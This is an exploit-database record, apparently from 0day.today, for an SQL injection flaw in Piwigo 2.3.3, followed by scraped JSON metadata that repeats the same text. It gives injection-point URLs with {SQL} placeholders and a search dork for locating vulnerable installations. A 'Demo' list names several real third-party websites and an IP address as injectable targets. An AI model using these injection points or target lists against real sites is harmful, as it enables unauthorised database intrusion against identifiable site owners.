ID 1337DAY-ID-17618
Type zdt
Reporter TeaM MosTa
Modified 2012-03-04T00:00:00
Description
Exploit for php platform in category web applications
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : piwigo <== SQL Injector
# Date : 26-02-2012
# Author : TeaM MosTa
# Version : 2.3.3
# Dork : "Propulsé par Piwigo"
# Tested on : Window 7 , B-T.5
# Greetz : milw0rm 1337day.com
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+
Exploit
http://127.0.0.1/piwigo/index.php?/category/1" <===> {SQL}
comments.php?display_mode=albums <===> {SQL}
#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)
#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)
#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)
#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)
#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)
#6 include /home/fanslyon/public_html/piwigo/index.php(27)
Demo :
http://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}
http://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}
http://photos.ugtg.org/picture.php?/194/categories%22{SQL}
http://www.nature-granville-chausey.com/picture.php?/40/category/4%22
http://tedybear.fr/piwigo/index.php?/category/194%22
+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :
[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]
[# Kàràm Eddiñé BiLàmi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]
[#Mail: [email protected] #]
# 0day.today [2018-03-13] #
{"hash": "9c2733ba7024fd94b952cc4f1171e6d0b9c54170e4b0ac25b400dfd547791745", "id": "1337DAY-ID-17618", "lastseen": "2018-03-13T20:34:53", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "6c262facc1690d39dcf1a5e9cb7838e7", "key": "href"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "modified"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "526505df8e6f34da06a8fc4663cc47c9", "key": "reporter"}, {"hash": "4297fa5388c931d92b6270a749d1a020", "key": "sourceData"}, {"hash": "0d02c6144056f922958510e5b3c74f10", "key": "sourceHref"}, {"hash": "111f52da444070b13b3e8191b0fc94e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-03-13T20:34:53"}, "dependencies": {"references": [], "modified": "2018-03-13T20:34:53"}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17618", "description": "Exploit for php platform in category web applications", "title": "piwigo v.2.3.3 SQL Injector", "history": [{"bulletin": {"hash": "9b2ec6c2ac2fc66bd0deca092006deccb6726951a63c29652efc79137f513cfc", "id": "1337DAY-ID-17618", "lastseen": "2016-04-20T02:11:07", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T02:11:07"}}, "hashmap": [{"hash": "6eed0eb1c16b97449578bf2270a84ae7", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "111f52da444070b13b3e8191b0fc94e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "modified"}, {"hash": "526505df8e6f34da06a8fc4663cc47c9", "key": "reporter"}, {"hash": "6b6d03a87e5013f4d8969be10bbf0f0a", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c5fcd40b928e6c4f96d126efdc63d1ca", "key": "sourceData"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17618", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "piwigo v.2.3.3 SQL Injector", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "+--------------------------------------------------------------------------------------------------------------------------------+\r\n# Exploit Title : piwigo <== SQL Injector\r\n# Date : 26-02-2012\r\n# Author : TeaM MosTa\r\n# Version : 2.3.3\r\n# Dork : \"Propuls\u00e9 par Piwigo\"\r\n# Tested on : Window 7 , B-T.5\r\n# Greetz : milw0rm 1337day.com\r\n+--------------------------------------------------------------------------------------------------------------------------------+\r\n+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+\r\nExploit\r\nhttp://127.0.0.1/piwigo/index.php?/category/1\" <===> {SQL}\r\ncomments.php?display_mode=albums <===> {SQL}\r\n#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)\r\n#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)\r\n#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)\r\n#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)\r\n#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)\r\n#6 include /home/fanslyon/public_html/piwigo/index.php(27)\r\nDemo :\r\nhttp://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}\r\nhttp://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://photos.ugtg.org/picture.php?/194/categories%22{SQL}\r\nhttp://www.nature-granville-chausey.com/picture.php?/40/category/4%22\r\nhttp://tedybear.fr/piwigo/index.php?/category/194%22\r\n\r\n+----------------------------------------------------------------------------------------------------------------------------------+\r\nTnKs To :\r\n[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]\r\n[# K\u00e0r\u00e0m Eddi\u00f1\u00e9 BiL\u00e0mi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]\r\n[#Mail: team-mosta@hotmail.fr #]\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-03-04T00:00:00", "references": [], "reporter": "TeaM MosTa", "modified": "2012-03-04T00:00:00", "href": "http://0day.today/exploit/description/17618"}, "lastseen": "2016-04-20T02:11:07", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "+--------------------------------------------------------------------------------------------------------------------------------+\r\n# Exploit Title : piwigo <== SQL Injector\r\n# Date : 26-02-2012\r\n# Author : TeaM MosTa\r\n# Version : 2.3.3\r\n# Dork : \"Propuls\u00e9 par Piwigo\"\r\n# Tested on : Window 7 , B-T.5\r\n# Greetz : milw0rm 1337day.com\r\n+--------------------------------------------------------------------------------------------------------------------------------+\r\n+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+\r\nExploit\r\nhttp://127.0.0.1/piwigo/index.php?/category/1\" <===> {SQL}\r\ncomments.php?display_mode=albums <===> {SQL}\r\n#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)\r\n#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)\r\n#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)\r\n#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)\r\n#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)\r\n#6 include /home/fanslyon/public_html/piwigo/index.php(27)\r\nDemo :\r\nhttp://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}\r\nhttp://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://photos.ugtg.org/picture.php?/194/categories%22{SQL}\r\nhttp://www.nature-granville-chausey.com/picture.php?/40/category/4%22\r\nhttp://tedybear.fr/piwigo/index.php?/category/194%22\r\n\r\n+----------------------------------------------------------------------------------------------------------------------------------+\r\nTnKs To :\r\n[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]\r\n[# K\u00e0r\u00e0m Eddi\u00f1\u00e9 BiL\u00e0mi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]\r\n[#Mail: [email\u00a0protected] #]\r\n\r\n\n\n# 0day.today [2018-03-13] #", "published": "2012-03-04T00:00:00", "references": [], "reporter": "TeaM MosTa", "modified": "2012-03-04T00:00:00", "href": "https://0day.today/exploit/description/17618"}
{}
